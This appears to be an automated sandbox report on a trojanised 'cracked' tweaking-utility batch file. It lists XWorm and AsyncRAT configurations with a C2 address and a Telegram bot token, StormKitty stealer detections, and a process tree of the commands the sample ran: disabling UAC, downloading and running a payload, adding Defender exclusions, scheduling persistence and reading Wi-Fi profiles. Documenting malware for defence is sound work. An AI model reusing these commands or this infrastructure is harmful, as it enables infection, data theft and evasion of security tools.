Resubmissions

30-05-2024 10:57

240530-m2a24sfg76 10

Analysis

  • max time kernel
    74s
  • max time network
    68s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-05-2024 10:57

General

  • Target

    EXM_Premium_Tweaking_Utility_1.0_Cracked.bat

  • Size

    672KB

  • MD5

    f9ca73d63fe61c4c401528fb470ce08e

  • SHA1

    584f69b507ddf33985673ee612e6099aff760fb1

  • SHA256

    16431cc14917abeb316e0bc44045440a8f86b7ac4fdd0dce99de6435d493ecca

  • SHA512

    6fd03320ec84baf09a16a127c2c0ed3c265906fcb1a3b807c13001e775c396b66539238392438a8f290be04b8b8684050736331f8f99dbe8b868b44f154dd9de

  • SSDEEP

    3072:BIGzQbmbkAqA2xH7VkKEn14IZVvisLur+K3:BIGiVNEn14IZVvisL43

Malware Config

Extracted

Family

xworm

C2

193.161.193.99:49836

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    svchost.exe

  • telegram

    https://api.telegram.org/bot6701075763:AAGkvv2CpqBxGihH8FtOkSA7Uxy35GZpAFI/sendMessage?chat_id=5991331733

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot6701075763:AAGkvv2CpqBxGihH8FtOkSA7Uxy35GZpAFI/sendMessage?chat_id=5991331733

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Xworm Payload 2 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 52 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1288
    • C:\Windows\system32\reg.exe
      Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f
      2⤵
        PID:3236
      • C:\Windows\system32\reg.exe
        Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f
        2⤵
          PID:936
        • C:\Windows\system32\reg.exe
          Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
          2⤵
            PID:1940
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:788
          • C:\Windows\system32\reg.exe
            Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
            2⤵
            • UAC bypass
            PID:1800
          • C:\Windows\system32\reg.exe
            Reg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f
            2⤵
              PID:3312
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3276
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path Win32_UserAccount where name="Admin" get sid
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2492
              • C:\Windows\system32\findstr.exe
                findstr "S-"
                3⤵
                  PID:5048
              • C:\Windows\system32\chcp.com
                chcp 65001
                2⤵
                  PID:3556
                • C:\Windows\system32\chcp.com
                  chcp 437
                  2⤵
                    PID:4612
                  • C:\Windows\system32\curl.exe
                    curl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"
                    2⤵
                      PID:2372
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'
                      2⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3964
                    • C:\exm\EXMservice.exe
                      EXMservice.exe
                      2⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:2476
                      • C:\ProgramData\svchost.exe
                        "C:\ProgramData\svchost.exe"
                        3⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:4360
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3388
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4124
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\svchost.exe'
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3496
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2232
                        • C:\Windows\System32\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Local\svchost.exe"
                          4⤵
                          • Creates scheduled task(s)
                          PID:732
                      • C:\ProgramData\runtimebroker.exe
                        "C:\ProgramData\runtimebroker.exe"
                        3⤵
                        • Executes dropped EXE
                        • Drops desktop.ini file(s)
                        • Checks processor information in registry
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1940
                        • C:\Windows\SysWOW64\cmd.exe
                          "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2476
                          • C:\Windows\SysWOW64\chcp.com
                            chcp 65001
                            5⤵
                              PID:4920
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh wlan show profile
                              5⤵
                                PID:2844
                              • C:\Windows\SysWOW64\findstr.exe
                                findstr All
                                5⤵
                                  PID:4532
                              • C:\Windows\SysWOW64\cmd.exe
                                "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4780
                                • C:\Windows\SysWOW64\chcp.com
                                  chcp 65001
                                  5⤵
                                    PID:4468
                                  • C:\Windows\SysWOW64\netsh.exe
                                    netsh wlan show networks mode=bssid
                                    5⤵
                                      PID:4928
                              • C:\Windows\system32\chcp.com
                                chcp 65001
                                2⤵
                                  PID:436
                                • C:\Windows\system32\chcp.com
                                  chcp 437
                                  2⤵
                                    PID:4616
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command "& {Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('ONLY DO THESE ON ETHERNET, WIFI TWEAKS COMING IN 1.0', 'Exm Tweaking Utility', 'Ok', [System.Windows.Forms.MessageBoxIcon]::Information);}"
                                    2⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3888

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\ProgramData\runtimebroker.exe

                                  Filesize

                                  225KB

                                  MD5

                                  8008775094d446eaed43a423cd8a26f9

                                  SHA1

                                  4b8ef16e4a70fed23dc20cc5e27566df1e06af04

                                  SHA256

                                  48a06f8dbe0c56894b38bb3489c8ed5243d246328c512ee265bc31de441b5e1f

                                  SHA512

                                  6d9f2dca0d9032702971b339b7df65efab1c95d76e89044cf36ed43ef3116d21d1203d1561bd5fb4bd838d4df3dfbd240e2c89b715400f7a89037a3757326792

                                • C:\ProgramData\svchost.exe

                                  Filesize

                                  88KB

                                  MD5

                                  424bd17cfc4d1a3c274b5368d27b2b16

                                  SHA1

                                  a3f372325ba20b7283cd243f3a1cb00c260fd779

                                  SHA256

                                  317da7fba13d450ff8b7340fc45b026fe20d1ac5776852abbc196a70c4edf15a

                                  SHA512

                                  42c448380d2c05b7230c245730913c735a8a0e067c2be8828f3a07799e75d4c4911258431bb05edf528944b983a62e3d75ce48c7813b926eb0a0641e586c97c4

                                • C:\Users\Admin\AppData\Local\970751ee820a3dac716af4d4e92a2496\Admin@LLXDHEWC_en-US\System\Process.txt

                                  Filesize

                                  4KB

                                  MD5

                                  58fb2a819ad9a6e3bc92ceb82f86c24c

                                  SHA1

                                  723590ef6209ac1e61202c003bd2c5366f8bd7f9

                                  SHA256

                                  55d008dd82fff26ff4cb151b0f2568f8a36e4ccd61b6e25453f6fe4998ca823b

                                  SHA512

                                  a6d0ccf0c99529530ed6790f9c1f74de65e93c315ed1ddc38f50a69ab7eb45d2ce4d30cb8fa7831c0fce6320a09f6b0de4aab34d3a840df704df3f60f07d744a

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                  Filesize

                                  2KB

                                  MD5

                                  6cf293cb4d80be23433eecf74ddb5503

                                  SHA1

                                  24fe4752df102c2ef492954d6b046cb5512ad408

                                  SHA256

                                  b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                  SHA512

                                  0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  1KB

                                  MD5

                                  2b8634a147a40bf4e6836be570a3e21d

                                  SHA1

                                  a1f2eb05ade58e4aa48b156e5de8d72dc04c4ad3

                                  SHA256

                                  2516904bf17e895f7b0c9bfec81fe1516de4d37c6a2835b8c83aa79f670f63ce

                                  SHA512

                                  78c5348a121bc00e6f7427dc4b11c301c4f2e898c4108eb328c8a740d96fc8a8a1f869b3769e84ec1b36fc483280ae7b6d5e9981e7bf2facd548944b036a0bd8

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  944B

                                  MD5

                                  8eb920ec36de874a0f1ba3c8b684ef1a

                                  SHA1

                                  429a2245091d55268a611729193f6dbfedf3b7a7

                                  SHA256

                                  670d7aaa9c419bf3ebfe19e7ff8fdf7f3c4fabf44be0c14ab296d20fc68e1948

                                  SHA512

                                  b2ebc48f296d07b7d3baa7596ee24c94fcc8085bf7a9c0d9eb660648d0ffa46dea1c99f8597a405af130dfec05867eed22e9d300732fc47bfb73917f2e806608

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  944B

                                  MD5

                                  54522d22658e4f8f87ecb947b71b8feb

                                  SHA1

                                  6a6144bdf9c445099f52211b6122a2ecf72b77e9

                                  SHA256

                                  af18fc4864bc2982879aed928c960b6266f372c928f8c9632c5a4eecd64e448a

                                  SHA512

                                  55f2c5a455be20dcb4cb93a29e5389e0422237bdd7ac40112fec6f16a36e5e19df50d25d39a6d5acb2d41a96514c7ecd8631ce8e67c4ff04997282f49d947aba

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  944B

                                  MD5

                                  22310ad6749d8cc38284aa616efcd100

                                  SHA1

                                  440ef4a0a53bfa7c83fe84326a1dff4326dcb515

                                  SHA256

                                  55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

                                  SHA512

                                  2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  64B

                                  MD5

                                  50a8221b93fbd2628ac460dd408a9fc1

                                  SHA1

                                  7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

                                  SHA256

                                  46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

                                  SHA512

                                  27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  944B

                                  MD5

                                  e60eb305a7b2d9907488068b7065abd3

                                  SHA1

                                  1643dd7f915ac50c75bc01c53d68c5dafb9ce28d

                                  SHA256

                                  ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135

                                  SHA512

                                  95c45afec6fa4e0b2a21edd10a6b2dc30568810c67bc9bc34d98ab111c48261f377a370583adb27e08616b0108026c119493b1b093b52ce931117e646b46cb7b

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sz1nucc1.zoi.ps1

                                  Filesize

                                  60B

                                  MD5

                                  d17fe0a3f47be24a6453e9ef58c94641

                                  SHA1

                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                  SHA256

                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                  SHA512

                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                • C:\Users\Admin\AppData\Local\Temp\exm.zip

                                  Filesize

                                  17.6MB

                                  MD5

                                  6f327c93d2774f815fa2fbed9c6a833a

                                  SHA1

                                  34ccaf41e3b6790f1344060682eb406af6aec884

                                  SHA256

                                  685c2177e06eb8fd5ac7e14794e3689c129cb643033452ef87d7549b96371d11

                                  SHA512

                                  a42ed6efaf7205208d8efd4c01b55ac14025ea4f7d258e9a44c355c0cf975743a9c06637ea1eb2fe8b9d3e30527622a905bfeb700599c9885a1ebe0690aa35d7

                                • C:\exm\EXMservice.exe

                                  Filesize

                                  327KB

                                  MD5

                                  9afded50538d3ecced82517a6ad7b5f9

                                  SHA1

                                  177d9e32159eef20f1264b3e9dc4f32ba8943b98

                                  SHA256

                                  c9dd77e8faa24fb8ab7faf371fb23e286464b6d30cdee205524578bc88df3b20

                                  SHA512

                                  acc3b5a5a20c1eabe0bc95c2199fd5e8681699db8c80942ffbdae9c887edab3e8ca9011c4736d50a8411d36227df38664e10c2b6e11a922bd24c2bbad596c49f

                                • memory/788-0-0x00007FFFEF2C3000-0x00007FFFEF2C5000-memory.dmp

                                  Filesize

                                  8KB

                                • memory/788-11-0x00007FFFEF2C0000-0x00007FFFEFD81000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/788-6-0x000001E7D49A0000-0x000001E7D49C2000-memory.dmp

                                  Filesize

                                  136KB

                                • memory/788-12-0x00007FFFEF2C0000-0x00007FFFEFD81000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/788-15-0x00007FFFEF2C0000-0x00007FFFEFD81000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1940-98-0x0000000000E10000-0x0000000000E4E000-memory.dmp

                                  Filesize

                                  248KB

                                • memory/1940-128-0x0000000005D20000-0x0000000005D86000-memory.dmp

                                  Filesize

                                  408KB

                                • memory/1940-291-0x00000000068E0000-0x0000000006972000-memory.dmp

                                  Filesize

                                  584KB

                                • memory/1940-292-0x0000000006F30000-0x00000000074D4000-memory.dmp

                                  Filesize

                                  5.6MB

                                • memory/1940-296-0x0000000006980000-0x000000000698A000-memory.dmp

                                  Filesize

                                  40KB

                                • memory/2476-73-0x0000000000260000-0x00000000002B8000-memory.dmp

                                  Filesize

                                  352KB

                                • memory/3964-29-0x000001D9CA430000-0x000001D9CA43A000-memory.dmp

                                  Filesize

                                  40KB

                                • memory/3964-28-0x000001D9CA450000-0x000001D9CA462000-memory.dmp

                                  Filesize

                                  72KB

                                • memory/4360-94-0x0000000000DE0000-0x0000000000DFC000-memory.dmp

                                  Filesize

                                  112KB